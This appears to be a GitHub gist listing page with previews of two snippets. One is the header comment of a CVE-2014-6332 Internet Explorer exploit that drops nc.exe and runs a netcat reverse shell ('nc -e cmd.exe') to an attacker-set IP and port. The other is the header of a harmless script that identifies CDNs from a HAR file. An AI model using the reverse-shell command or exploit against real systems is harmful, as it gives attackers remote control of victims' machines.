a3roger
worawit
/ cve-2014-6332_exploit.html
Last active
March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
waqaraqeel
/ get_cdn.py
Last active
February 23, 2023 22:43
Figures out which CDNs were involved in a webpage fetch given HAR file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Figures out which CDNs were involved in a webpage fetch given HAR file. | |
| Requires dnspython | |
| Borrows heavily from https://github.com/turbobytes/cdnfinder | |
| Thank you to cdnplanet.com | |
| Usage: ./get_cdn.py -f har-file | |
| Or you could just import the get_cdn function |